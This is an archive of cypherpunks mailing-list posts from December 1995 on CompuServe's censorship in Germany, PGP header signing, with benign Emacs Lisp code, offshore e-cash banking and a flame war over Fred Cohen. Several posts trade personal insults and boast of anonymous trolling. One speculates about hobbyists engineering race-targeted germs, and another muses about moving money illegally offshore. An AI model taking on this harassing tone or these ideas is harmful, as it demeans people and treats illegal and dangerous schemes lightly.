Mind", Karen Alexander and Rick Boyes -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOW5DCS9AwzY9LDxAQEF3QP/SjHSSva0F/aolc++yrQbL9Mk0V/Nnl60 mxUmDKJ2C8dH9D5EKwwPhgQ1kknp/90JGHztzjKJwG9jkPDixMa1vL3U4iRToy3v kQ9Ziwr5A/WwMS+6d0++54qMwMEgwVWdmbVJVzrB6VxSPqvVvlmw3t7keBnZGiRA 1dT7Rlq1HsY= =tm8l -----END PGP SIGNATURE----- From wb8foz at nrk.com Sun Dec 31 07:14:17 1995 From: wb8foz at nrk.com (David Lesher) Date: Sun, 31 Dec 95 07:14:17 PST Subject: Australian "calculatorcard" In-Reply-To: <01HZFQH4O0R695OXTW@MAIL-CLUSTER.PCY.MCI.NET> Message-ID: <199512311459.JAA00430@nrk.com> > sounds like the card i use for remote dialup to certain non-public > systems i use at work. it has a six digit number on the front that > changes every 60 seconds. Do these card systems use a window to handle clock-slip? I'd think you could have the server safely accept # N, N-60 sec, and N+60 seconds; and adjust the server's idea of your card's clock speed from that. What new risk would that create? -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From jya at pipeline.com Sun Dec 31 07:18:17 1995 From: jya at pipeline.com (John Young) Date: Sun, 31 Dec 95 07:18:17 PST Subject: SEY_use Message-ID: <199512311518.KAA19667@pipe4.nyc.pipeline.com> 12-31-95. WashP: Emulating US founding outlaws, the Seychelles government has enacted an investment law described by transatlantic neo-imperialists as a "Welcome, Criminals" act. The law offers anyone who invests $10 million or more in Seychelles -- no questions asked as to the source -- protection from extradition, from seizure of assets and to other "concessions and incentives commensurate with the investment." Neo-imps say this is "an open invitation to money launderers and other international criminals to set up shop with impunity." Under the statute the Seychelles government could grant diplomatic passports and other protections as a shield from thermonuclear pornography. SEY_use From cjs at netcom.com Sat Dec 30 15:37:48 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Sun, 31 Dec 1995 07:37:48 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <9512302200.AA14470@all.net> Message-ID: <199512302133.QAA00352@localhost.cjs.net> > > The Subject says it all... I believe Fred suffers from a severely inflated > > ego and suffers from the "false expert" syndrome detailed by various > > self-help orgs... what say you fred?? > > People who call me a "false expert" are so afraid of damaging their own > reputation by doing so that they have to do it anonymously. Reguardless if it is said anonymously or not, the fact remains that you are a loon, and you couldn't get a clue if they gave them away in rice krispies boxes. As always, I encourage everyone reading this thread to not reply to it 'cuz it does nothing but encourage Freddy to post more jibberish. > > -> See: Info-Sec Heaven at URL http://all.net/ > Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From ryan at pobox.com Sat Dec 30 16:13:42 1995 From: ryan at pobox.com (Ryan Lackey) Date: Sun, 31 Dec 1995 08:13:42 +0800 Subject: Starting an e-cash bank Message-ID: <199512302305.SAA20998@netaxs.com> _Money_ is at the root of control of cyberspace. If states control the banks issuing the currency, states will control cyberspace. If the banks/issuers of coins are beyond the reach of statist governments, cyberspace will remain free. Crytpo of course will allow the banks to issue coins, but if they have to follow statist laws, crypto won't really help them all that much -- I don't know many bank execs willing to face down the US Government with nothing to back them up but ~unbreakable codes. What would it take to start an anonymous, private, secure, etc. etc. bank issuing e-cash, located in a country without taxes/etc.? I assume a tax haven like the Cayman Islands or a small third world country somewhere would have plenty of nice tax-shelter banks interested in such a venture. Of course, it would be quite illegal to transfer money to such a bank, but once it's there, wouldn't coins be perfectly legitimate currency? The bank could even make money by issuing coins for $US held in vaults, $US invested in different mutual-fund type things or other currencies, and perhaps even coins backed only by the bank's profits (sounds like stock). A cypherpunk? me?, Ryan From tcmay at got.net Sat Dec 30 16:32:13 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 31 Dec 1995 08:32:13 +0800 Subject: Compuserve is Not "Censoring": Look to Governments for the Cause Message-ID: At 11:17 AM 12/30/95, Ulf Moeller wrote: > From the comment by Niklaus Haubl�tzel: > >"Reality cannot be outlawed, only improved, and many still hope that >complete freedom of information and opinion in computer networks can >contribute to that. But the company of CompuServe does not seem to >be interested in that. They only want their customers' money, but >not their freedom. [...] Like any censorhip, this one comes with >hipocrisy. Towards their paying customers, CompuServe claims to have >been forced by German prosecutors. Thus one lie creates another. >That they were forced it out of the question. It is only in >dictatorships that the prosecutors judge the defendants - that is why >dictatorships need censors." Well said by this person! (Except for the point about Compuserve's "greed"...greed is good.) I am hopeful that Germany can move away from this censorious position (whether they prosecuted CS or not, there was clearly the threat of prosecution, and CS caved into it). As with the Cornell case, where students "volunteered" to perform "community service" and thus Cornell did not otherwise discipline them for their speech (the "75 Reasons" joke they sent to their friends), the mere possibility of punishment/sanction is usually sufficient. This is called "the chilling effect" in free speech discussions. Longterm, the solution still lies with moving toward smaller units directly accessing the Net, thus making threats harder to effectively mount. --Tim May We got computers, we're tapping phone lines, we know that that ain't allowed From steve at miranova.com Sat Dec 30 16:40:24 1995 From: steve at miranova.com (Steven L. Baur) Date: Sun, 31 Dec 1995 08:40:24 +0800 Subject: easy avoidance of PGP signature forgeries and reuse In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- [sample implementation for Gnus is included] >>>>> "Dimitri" == Dimitri Vulis writes: Dimitri> I propose a format below. See the PGP header block attached to this message as an example of this proposed format. atilla> with e-mail, e-letters, direct faxes, etc. it is to easy atilla> to ignore the courtesy header. From a standpoint of atilla> security, you have blown away each of the attacks outline atilla> in your article in so much as the signature will not atilla> compute if the courtesy block is omitted. Dimitri> I totally agree; that's why I propose copying that info Dimitri> in the signed portion "by default". atilla> personally, I do not think PGP 3 should attempt to solve atilla> the problem. Most of the headers involved are applied atilla> _after_ the message leaves the mail program; and, PGP atilla> interfaces are virtually the same as invoking an alternate atilla> editor, which gets you nothing. I agree. Besides, this whole thing can be done with the existing PGP. Date: and Message-ID: are two, and they need to be signed. Date: is a further problem with Gnus, since the format of the displayed date is user customizable, but that's a separate issue. ... Dimitri> The "signed headers" portion may contain the following Dimitri> optional fields: Dimitri> From: address -- the address associated with the key used Dimitri> to sign this message It's easier to deal with whatever is being used as the From: in the message. ... Dimitri> (Of course, the poster could lie and claim in the signed Dimitri> portion that the article is being posted to alt.sex.pedo Dimitri> when he himself posts it to misc.kids:) So you would also include the Message-ID:. Dimitri> If a standard like this catches on, and is integrated Dimitri> into PGP-aware news/e-mail programs, then it's a simple Dimitri> exercise to write a little script to look for BEGIN PGP Dimitri> SIGNED HEADERS and compare the information inside it with Dimitri> the RFC 822/1036 headers outside the signed portion of Dimitri> the message. It could be done within PGP too. This is basically a Good Idea, and can be implemented using existing tools. Here is some to code to implement it for Gnus. Verification of the headers is left (at present) as an exercise for the reader. ;;; Add this to your .gnus and call ;;; gnus-article-sign-message instead of mc-sign directly. ;;; Pgp signed messages are vulnerable to various kinds of badness due to ;;; the separation of header information. Fix it. (defconst gnus-pgp-included-headers '("From" "To" "Newsgroups" "Message-ID" "Date" "Subject" "Cc" "Gcc") "Headers to include in signed portion of PGP signed message.") (defconst gnus-pgp-signed-headers "----BEGIN PGP SIGNED HEADERS----\n" "String to use for separation in message.") (defun gnus-article-sign-message (arg) "Sign a message with PGP, including outgoing headers in an included block, as per the suggestion of \"Dr. Dimitri Vulis\" ." (interactive "p") (save-excursion (save-restriction (gnus-inews-narrow-to-headers) (goto-char (point-max)) (or (mail-fetch-field "date") (insert (concat "Date: " (gnus-inews-date) "\n"))) (or (mail-fetch-field "message-id") (insert (concat "Message-ID: " (gnus-inews-message-id) "\n"))))) (save-excursion (goto-char (point-max)) (insert "\n") ;; If there is already a header block (eg. after undoing a signature) ;; remove it entirely, and rebuild from scratch. (if (re-search-backward gnus-pgp-signed-headers nil t) (kill-region (point) (point-max))) (insert gnus-pgp-signed-headers) (let ((headers gnus-pgp-included-headers) header header-value) (while (setq header (car headers)) (setq headers (cdr headers)) (save-excursion (save-restriction (gnus-narrow-to-headers) (setq header-value (mail-fetch-field header)))) (if header-value (insert (concat header ": " header-value "\n")))) (insert "\n"))) (mc-sign arg)) - -- steve at miranova.com baur - ----BEGIN PGP SIGNED HEADERS---- To: cypherpunks at toad.com Message-ID: Date: 30 Dec 1995 15:34:22 -0800 Subject: Re: easy avoidance of PGP signature forgeries and reuse -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBMOXMhKLJZEUiepcNAQGjtgP/ZnC+TL4cbFL3RF+o8fwe2YFciqGkOWX9 VuPK4btnvfKF/wcdMTfJoUKbSutKcwRkbLe5fAqEV3qrXwM7PgfNMlXfcgNg44It UhfLAaFg6ke5ArWr9EZfyFcD93OrS9qVGU7emSenmsqpdJUE6jU0HmKAQkZzP1Ak AYQD7ow/tzI= =PTV7 -----END PGP SIGNATURE----- From ses at tipper.oit.unc.edu Sat Dec 30 16:41:41 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sun, 31 Dec 1995 08:41:41 +0800 Subject: new years resolutions for cypherpunks In-Reply-To: <199512302133.QAA00352@localhost.cjs.net> Message-ID: Another year, another flamewar :-) Anyone else prepared to sign something similar? Simon -----BEGIN PGP SIGNED MESSAGE----- In 1996 I resolve to 1) Avoid ad-hominem attacks even on complete idiots 2) Not post non-crypto libertarian or consipracy items to cypherpunks. 3) Contribute to, Implement and use open cryptographic standards rather than proprietary ones. 4) Have most of my regular internet hosts running IPSEC before 1997. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AwUBMOXNiQkKftKguxLhAQEDsAL/ZoWeONP+R2pJrA9O9RuIu+Juljt04OIB pFYxH+DfktzDoX0dhfDkrP0TdjMiXnPI7Z5zkidF4O2oUJ0Myzv1F9VSgFXiyU7X BHUxnazXmhj7crbt86YIwchxqgLGVVNw =Bwyh -----END PGP SIGNATURE----- (defun modexpt (x y n) "computes (x^y) mod n" (cond ((= y 0) 1) ((= y 1) (mod x n)) ((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n)) (t (mod (* x (modexpt x (1- y) n)) n)))) From frankw at in.net Sat Dec 30 16:43:09 1995 From: frankw at in.net (Frank Willoughby) Date: Sun, 31 Dec 1995 08:43:09 +0800 Subject: Massey, CEO of Compuserve, on Internet Message-ID: <9512302338.AA07501@su1.in.net> Peter D. Junger writes: 8< [snip] >One should also notice that Bavaria is only one state in the German >Federal Republic; this case is more like Texas investigating >Compuserve than the United States federal government investigating >Compuserve. Bavaria is the stronghold of what can properly be called >the (Catholic) Religious Right in Germany. It should also be noticed >that in general German publications and television seem to be less >constrained in publishing materials that in the United States would be >called ``indecent'' by some than are United States publications and >broadcasters. > Peter has made some rather astute and accurate observations. (I particularly liked his analogy of Bavaria & Texas. From my experience, I would say that Bavaria is the Texas of Germany.) While the Computserve incident in Germany may provoke outrage here & across the Internet, given the culture and other factors, the incident itself was rather inevitable (really). After having lived in Munich & Stuttgart, I'm just surprised it took so long to happen. (Then again, the wheels of bureaucracy do spin slowly). 8^) I'm not saying I agree with their actions, but I think I do understand the mentality behind the actions. I would venture to guess that the Bavarian State Police were trying to enforce the JugendSchutzGesetz (Protection of Minors Law). These laws are posted in every restaurant, bar, etc. As indicated by its title, the law basically serves to protect minors from the evils of the adult world. It spells out what ages a person has to be to drink beer, hard liquor, etc, and covers curfews and other similar topics which serve to protect the youth. The Compuserve censorship may be the result of an interpretation or enhancement of the JSG - in that because Compuserve really has no way of knowing the age of individuals who have access to pornographic materials, it is not capable of fully implementing the JSG. (Although how this differs from cable TV (which shows porno movies and can't controll who sees them is beyond me). Without commenting on the actions of the Bavarian State Police or Compuserve, I think that perhaps we are applying our standards to an incident in another culture - without viewing it in the context of that culture or country. (In other words, comparing apples and oranges.) FWIW, there are a few differences between the USA and Germany which are related to the Compuserve incident and which may help to understand why the police performed their actions. I am not saying I agree with their actions, only that I think I understand the mentality behind the actions. Anyway, here are a few differences: 1) Germans (and foreigners who live/work there) enjoy fewer freedoms than we do - including freedom of speech, press, assembly, movement, etc. 2) The legal system is different than in the USA. I'm not a lawyer, but my impressions were that the police had far more liberties with what they (legally) can do than do our counterparts here or in other countries. The OJ fiasco probably couldn't have happened in Germany (and he probably also wouldn't have gotten off). 3) There is no real separation of Church & State like we have here in the USA. As a result, the impact of the Catholic & Lutheran churches on the German legal system & government is significant. It has also led the the government subsidizing (ie - providing public funds to) the churches. FWIW, the German government (like every other government on the planet) is ill-equiped to handle something like the Internet and its impact on the social & legal systems of that country. FWIW, the above is my opinion based on having lived there for over 9 years. Best Regards, Frank >-- >Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH >Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu PS - The rest of this mail contains an elaboration of the points mentioned earlier. They were separated from the summarized info mentioned above for those who are short on time or have no interest in the long version. PPS - Four really neat things about Germany are the BDSG (Privacy Act), the mandatory (by law) 6-weeks paid vacation for all full-time employees, their sausages, and skiing. (Their sausages are really great. You might even say they're the best of the wurst. The skiing can be flakey on occasion, though.) 8^) 8^) 8^) PPPS - Have a Happy & Prosperous New Year! 8^) ----------------------------------------------------------------------------- The following is an elaboration of the above differences, based on my observations while I was there. I'm not taking a stand one way or another on these differences in this mail, just indicating what they are. 1) Germans (and foreigners who live/work there) enjoy fewer freedoms than we do. A few examples: - it is mandatory (ie - a law) that citizens & foreigners register their domicile address with the police. (When you move, you have to unregister with the police in your old city, & register with them in the new city). - it is not trivial to obtain a permit for a weapon (or obtain a hunting license). - it is against the law to monitor police & government frequencies - until 1984/85), the radio & TV media were a monopoly of the State (or government). Commercial (ie - non-government owned) radio & TV stations didn't exist until then. - the freedom of speech is more restricted than here. Use of the swastika symbol is prohibited by law. Groups attempting to deny the abuses of WW II or promoting the rhetoric of the Hitler regime are outlawed. - all demonstrations must be registered (and approved) by the police before they can ocur. - mandatory store closings (general). Most stores are open 'til 6pm on Monday, Tuesday, Wednesday, and Friday. They stay open late ('til 8:30pm) on Thursdays. Saturdays, the stores are open 'til 2pm unless it is the first Saturday of the month (& then 'til 5pm). - all TVs, radios have to be registered with the BundesPost (and you will be charged a fee). The BundesPost uses vans with have the ability to detect which apartments have TVs (as well as which channel the individual is watching). (I have seen the vans & have had a brief conversation with some of the BP employees who have used this equipment). 2) The legal system is different than in the USA. I'm not a lawyer, but my impressions were that the police had far more liberties with what they (legally) can do than do our counterparts here or in other countries. On the plus side, the police are very efficient (but having access to a nationwide databank about every person in the country helps to increase the efficiency in catching crooks). - One law in particular is the JugendSchutzGesetz (Protection of Minors Law). The JSG spells out exactly what ages a person has to be to drink beer, hard liquor, etc. (I believe it also covers curfews, movie ratings, etc.). The Compuserve censorship may be the result of an interpretation or enhancement of the JSG - in that because Compuserve really has no way of knowing the age of individuals who have access to pornographic materials, it is not capable of fully implementing the JSG. (Although how this differs from cable TV (which offers porno movies is beyond me). - One thing to be admired, though, is the German Information/Data Privacy Act (BundesDatenSchutzGesetz = BDSG). The BDSG is one of the most stringent privacy laws in the world. Actually, it is a shame that we don't have a law like the BDSG (with a few minor changes). (Our Privacy Act here in the USA is a joke). The abuses of privacy which result in the collection and distribution of personal data here in the USA is simply unbelievable. - I also had the impression that in the German court system, the burden of proof is on the accused, not the prosecution. This is somewhat analagous to the military courts here in the USA. 3) There is no separation of Church & State like we have here in the USA. - All persons who are subject to taxes are required to pay a Church Tax (Kirchensteuer) of 1% of their pay to support a few of the major churches in Germany (primarily, the Catholic, the Lutheran, and the Jewish religious institutions). The only exemption to this is for those who fill out an affadavit that they have formally left their church or those whose voluntary contributions to their church exceed 1%. BTW, the German tax laws also differentiate between members of the 3 churches mentioned above & others. - Major religious institutions are subsidized & receive financial support by the government (from the Kirchensteuer), as well as additional funding for the preservation & upkeep of historic religious buildings, etc. I remember seeing an investigative report on German TV which provided a list of which religious institutions received how much money and the reason why those funds were given to the churches by the government. I don't remember the acutual sums involved, but they were rather large (hundreds of millions of dollars or above, if my memory serves). - The Catholic & Lutheran churches in particular have enormous political clout (far more than they ever could here in the USA) and are a force to be reckoned with. Although from my observations, the Catholic church has more clout than the Lutheran. Their clout has a major impact on the political & legal sytems in Germany. An illustration of this is that one of the top two political parties in Germany is the CDU (Christian Democratic Union). - The ability of a church's missionaries to proselytize is heavily regulated/restricted - particularly if they are not one of the top three churches mentioned earlier. - In general, the top 3 churches mentioned above are given preferential treatment. Other denominations are generally ignored by the German government. In conclusion: None of the above statements are intended to be critical of Germans or of the German government, or anything/anyone else. These are merely my personal observations. ----------------------------------------------------------------------------- Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From tcmay at got.net Sat Dec 30 16:48:25 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 31 Dec 1995 08:48:25 +0800 Subject: Guerilla Internet Service Providers Message-ID: At 6:18 PM 12/30/95, Lucky Green wrote: >At best, Cypherpunks can hope to provide the infrastructure that will allow >an underground to communicate semi-securely. We are unable to stop the >global tidal wave of fascism. Let's not waste our time on bemoaning the >freedoms crushed in its path. We have more important work to do. And support your local ISPs! (Or, even better, direct connection to the Net, though this is harder for most of us to arrange.) This CompuServe situation should be a great recruiting opportunity. Cypherpunks in various parts of the country (and outside the U.S.) can get active in local AOL, Prodigy, and Compuserve groups (and maybe even Netcom chat groups, as Netcom is large enough to be a ripe target for harassment by some zealous prosecutor or tort-crazed lawyer, as the Church of Scientology case showed). They can tell the folks about local alternatives. Having lots of small, decentralized providers makes censoring the Net all the harder. Guerilla Internet Service Providers. (I'm not disparaging Netcom. Tom Klemesrud not only fought the CoS, he has also spoken out against CompuServe's action. I just understand that the "deep pockets" effect means that any ISP large enough to register on the radar screens of the statists will be targetted for regulation and sanctioning. Better to have a thousand services, melting into the jungle when the heavy artillery arrives.) --Tim May We got computers, we're tapping phone lines, we know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 - 1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From an5877 at anon.penet.fi Sun Dec 31 09:10:48 1995 From: an5877 at anon.penet.fi (deadbeat) Date: Sun, 31 Dec 95 09:10:48 PST Subject: Fred Cohen, PhD Message-ID: <9512311704.AA03856@anon.penet.fi> -----BEGIN PGP SIGNED MESSAGE----- Regarding Fred Cohen, PhD: Cohen's haughty and bombastic style do nothing good for his reputation. I assume he advertises his PhD to highlight his early accomplishments; he has done little since. Let's also consider the granting institution, a second-rank school. Cohen's thesis broke new ground, but how many people have read it, or any of his writings, or know anything about his ideas beyond a single word? How far did he carry this work? Where are the conference and journal papers? Cohen's reputation faded into obscurity long ago. Now he is building a new reputation as a pig-headed loudmouth, threatening his "defamers." Shades of Sternlight. DEADBEAT -----BEGIN PGP SIGNATURE----- Version: 2.4 iQBFAgUBMOa9TPFZTpBW/B35AQFLQQGAmzB8o+g5k3mYmzMmk3JiDTBf+P8dSFZY 25IwVISjSV7o95vgbmNWAy/3zVY50AKn =SfU6 -----END PGP SIGNATURE----- --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From doc at intellinet.com Sat Dec 30 17:43:26 1995 From: doc at intellinet.com (Doc) Date: Sun, 31 Dec 1995 09:43:26 +0800 Subject: EMail Blockade for Compuserve? Message-ID: <199512310121.TAA02917@intellinet.com> I dont know if this is a good idea. I think CI$ shut off the newsgroups due to economic presure- from some German officials. Drop them or we ban CI$. Now, if CI$ were to shed excess customers in the rest of the world... they might just turn those newsgroups back on. So if folks turned on twit filters and deleted-before-reading mail from anyone at compuserve - and if folks, newsletters etc refused to SEND mail to accounts at ci$ ... well if enough ci$ customers were to LEAVE. This is not a proposal..some of my best friends are at compuserve. From dlv at bwalk.dm.com Sat Dec 30 17:59:12 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 31 Dec 1995 09:59:12 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: <199512302211.QAA14605@dal1820.computek.net> Message-ID: The following comment has zero crypto relevance and should not be construed as an attack on and/or a defense of any particular net.personality: "Ed Carp [khijol SysAdmin]" writes: > OK, I'll do it. Fred, sometimes your pontifications make as little sense > as you arrogantly signing "Dr. Fred Cohen" in your name field. Without commenting on the quality of anyone's contributions to this mailing list, let me remind you that Dr. Fred Cohen received his Ph.D. after writing a very innovative thesis on computer viruses, a classic in his field. He has every right to call himself "Dr." if he wants to. In my experience, people who get so hysterical when a Ph.D. calls himself or herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives trying and failing to attain a Ph.D. and are bitterly envious of those who have succeeded. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From erc at dal1820.computek.net Sat Dec 30 18:17:48 1995 From: erc at dal1820.computek.net (Ed Carp [khijol SysAdmin]) Date: Sun, 31 Dec 1995 10:17:48 +0800 Subject: Is Dr Fred Cohen a Loon??? In-Reply-To: Message-ID: <199512310155.TAA12831@dal1820.computek.net> -----BEGIN PGP SIGNED MESSAGE----- > > The following comment has zero crypto relevance and should not be construed > as an attack on and/or a defense of any particular net.personality: > > "Ed Carp [khijol SysAdmin]" writes: > > OK, I'll do it. Fred, sometimes your pontifications make as little sense > > as you arrogantly signing "Dr. Fred Cohen" in your name field. > > Without commenting on the quality of anyone's contributions to this mailing > list, let me remind you that Dr. Fred Cohen received his Ph.D. after writing a > very innovative thesis on computer viruses, a classic in his field. He has > every right to call himself "Dr." if he wants to. > > In my experience, people who get so hysterical when a Ph.D. calls himself or > herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives > trying and failing to attain a Ph.D. and are bitterly envious of those who have > succeeded. Not at all -- but it's been *my* experience that people who rely on titles and degrees and such have very little else to recommend them. I am as unenvious of Mr. Cohen as I am of Bruce Schneier - and Bruce has a lot more of my respect. Just because someone writes a "very innovative thesis" on viruses doesn't mean they know diddly about anything else, especially cryptography. Where is Fred's paper? I've got Bruce's book on my shelf that I can read for myself and *that's* a classic in the field. When "I can read Fred's paper for myself, then I can judge the merits of his degree. Until then, I consider him no different than any other PhD whose gotten themselves a degree and become convinced that the doctorate entitles them to pontificate upon any and every subject under the sun as though they knew absolutely everything about any subject that happens to catch their fancy. Just remember - PhD means 'piled higher and deeper'. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/digital pager 800/558-3408 SkyPager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi "Past the wounds of childhood, past the fallen dreams and the broken families, through the hurt and the loss and the agony only the night ever hears, is a waiting soul. Patient, permanent, abundant, it opens its infinite heart and asks only one thing of you ... 'Remember who it is you really are.'" -- "Losing Your Mind", Karen Alexander and Rick Boyes -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOXtjyS9AwzY9LDxAQFoZQQAiBsi6i3tGeY1oJ4bL4UJthdmsW77ZybC BPpdGBvGc8IyJo9V2uMCW5nU/4LJeX08IAKWS1pt4xTPrz4HlLEJXgAWVnPErTqj V9MXmI1QY79cmtd2MvJUoUNtq7O4fbD4Hg/ZRRdY3YNZvrlXlRRdbU6m01xSAxOR 4ApMv7cboz4= =DjDf -----END PGP SIGNATURE----- From accessnt at ozemail.com.au Sat Dec 30 18:44:51 1995 From: accessnt at ozemail.com.au (Mark Neely) Date: Sun, 31 Dec 1995 10:44:51 +0800 Subject: Massey, CEO of Compuserve, on Internet Message-ID: <199512310220.NAA16258@oznet02.ozemail.com.au> >Wow! I am watching the CEO of Compuserve being interviewed on CNBC, >explaining how his company is "taking the high road by complying with the >laws of Germany" in removing access to 200 Usenet groups. >Timothy C. May I assume that C$ is only filtering the newsfeed as it hits German shores? Please tell me they aren't denying access to these "banned" newsgroups for all users worldwide! Mark ___ Mark Neely - accessnt at ozemail.com.au Lawyer, Professional Cynic Author: Australian Beginner's Guide to the Internet Work-in-Progress: Australian Business Guide to the Internet WWW: http://www.ozemail.com.au/~accessnt From shamrock at netcom.com Sat Dec 30 19:07:32 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 31 Dec 1995 11:07:32 +0800 Subject: Massey, CEO of Compuserve, on Internet Message-ID: At 13:20 12/31/95, Mark Neely wrote: >I assume that C$ is only filtering the newsfeed as it hits German shores? >Please tell me >they aren't denying access to these "banned" newsgroups for all users >worldwide! I am afraid they are. -- Lucky Green PGP encrypted mail preferred. From herbs at connobj.com Sat Dec 30 19:24:24 1995 From: herbs at connobj.com (Herb Sutter) Date: Sun, 31 Dec 1995 11:24:24 +0800 Subject: Is Dr Fred Cohen a Loon??? Message-ID: <2.2.32.19951231025816.0074caa0@mail.interlog.com> At 19:55 12.30.1995 -0600, Ed Carp [khijol SysAdmin] wrote: >I am as unenvious of Mr. Cohen as I am of Bruce Schneier - and Bruce has a >lot more of my respect. Just because someone writes a "very innovative >thesis" on viruses doesn't mean they know diddly about anything else, >especially cryptography. Where is Fred's paper? I've got Bruce's book on >my shelf that I can read for myself and *that's* a classic in the field. In that case, look at the last two pages in "Applied Crypto - 2nd ed", where Wiley puts ads for related books. You'll find: - "E-Mail Security", also by Bruce Schneier - "Protection and Security on the Information Superhighway", by Frederick B. Cohen - "Digital Money", by Daniel Lynch and Leslie Lundquist I am neither attacking nor defending Fred Cohen; I don't know him from Adam, and haven't read his messages or his book. But since you asked for where you can find Cohen's published work, there's one answer (assuming it's the same Fred Cohen). Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter (herbs at connobj.com) Connected Object Solutions 2228 Urwin - Suite 102 voice 416-618-0184 http://www.connobj.com/ Oakville ON Canada L6L 2T2 fax 905-847-6019 From nobody at flame.alias.net Sat Dec 30 19:30:33 1995 From: nobody at flame.alias.net (Anonymous) Date: Sun, 31 Dec 1995 11:30:33 +0800 Subject: Trolling for L00ns was Re: is Freddy Boy a Loon Message-ID: <199512310305.EAA03110@utopia.hacktic.nl> Ah... the targets bit perfectly... You see fred my boy being zapped by a nym wouldnt hurt SO bad unless on some level you believed the anon posters assertions about your behaviours were TRUE... you reacted exactly as predicted, as have David Sternlight, L Detweiler and a host of others... I normally lurk except when I get a chance to send anon barbs to puncture an EGO as inflated as yours.. anon p.s. You are next vlad... From jonnyx at edge.edge.net Sat Dec 30 20:23:34 1995 From: jonnyx at edge.edge.net (jonnyx) Date: Sun, 31 Dec 1995 12:23:34 +0800 Subject: (NOISE) Re: PLA_gue Germ Terrorism In-Reply-To: <199512301830.NAA05708@pipe4.nyc.pipeline.com> Message-ID: <199512310354.VAA02877@edge.edge.net> In a recent message, John Young babbled: > 12-30-95. To update the list of terrorist threats, the Wash > Post reports on the purchase in May of bubonic plague germs > by "white supremacist" Larry Wayne Harris, his bust by the > FBI and germ teams, prosecutors amazement that possession > of such deadly micro-organisms is not illegal, and the > consequent plea bargain of wire fraud with probation. < snip > Think that's fun? How 'bout this: given that the initial "mapping" phase of the human genome project is nearly complete, and the huge amount of genetic information available on the net, PLUS ever- more-powerful-yet-less-costly computers anyone can purchase, just how long do y'all think it'll be before some nut whips up a bug that targets, say, people with negroid genetic characteristics? Or epicanthic folds? Or blonde hair? Seem kinda far-fetched? The November NUTS & VOLTS has a nifty six page article on garage genetic experimentation (how to convert that old aquarium into an incubator, culturing techniques, etc.). They even list souces for equipment AND GERMS. Yes folks, you can order your very own "E-Z Gene Splicer DNA Recombination and Transformation Kit" from the good folks at Images Company, POBox 140742, Staten Island NY 10314, (718) 698-8305, $49.95 each, not recommended for children under 6 (too many parents complaining about mutated family cats). Quote from the article: "A word of caution is in order before we start. Although the materials in the kit are safe, it is important for you to follow simple procedures to keep the experiment controlled and nonthreatening." No shit. E-coli bacteria (what the kit uses) aren't pathogens, but still... I guess every budding young white supremist/right-wing religious nut/genocidal maniac has to start somewhere. Pleasant dreams. -- || ______ || comments, criticisms, and/or death-threats may be sent to: || || \__ /\ || jonny anonymous, c/o jonnyx at edge.net || || __/ / \ || or snail-mail pobox 23001, nashvegas tn 37202-3001, usa || || \__/_/\_\ ||______"DRIVING DRUNK ON THE INFORMATION SUPERHIGHWAY!"______|| ps - Hey! I violated the new copyright laws with my quote AND I wrote a dirty word that 10 year olds might read! Cool! Wonder how else this message can get me in trouble? From harveyrj at vt.edu Sat Dec 30 20:33:34 1995 From: harveyrj at vt.edu (R. J. Harvey) Date: Sun, 31 Dec 1995 12:33:34 +0800 Subject: Is Dr Fred Cohen a Loon??? Message-ID: <199512310359.WAA23216@quackerjack.cc.vt.edu> At 08:15 PM 12/30/95 EST, you wrote: > >In my experience, people who get so hysterical when a Ph.D. calls himself or >herself Dr. are invariably Ph.D. dropouts who wasted many years of their lives >trying and failing to attain a Ph.D. and are bitterly envious of those who have >succeeded. > Well, my experience is exactly the opposite: the ones who have to brandish the "Ph.D." label are the ones who were the least secure in their abilities, and the ones who seem least deserving of having ever graduated. Often the same folks who feel compelled to put "Dr." in their 'from' lines. This is from one of the numerous people on this list who have Ph.D.s and who don't wear them on their sleeves (and who only "wasted" 3 years of his life in getting one)... rj From cjs at netcom.com Sat Dec 30 20:35:29 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Sun, 31 Dec 1995 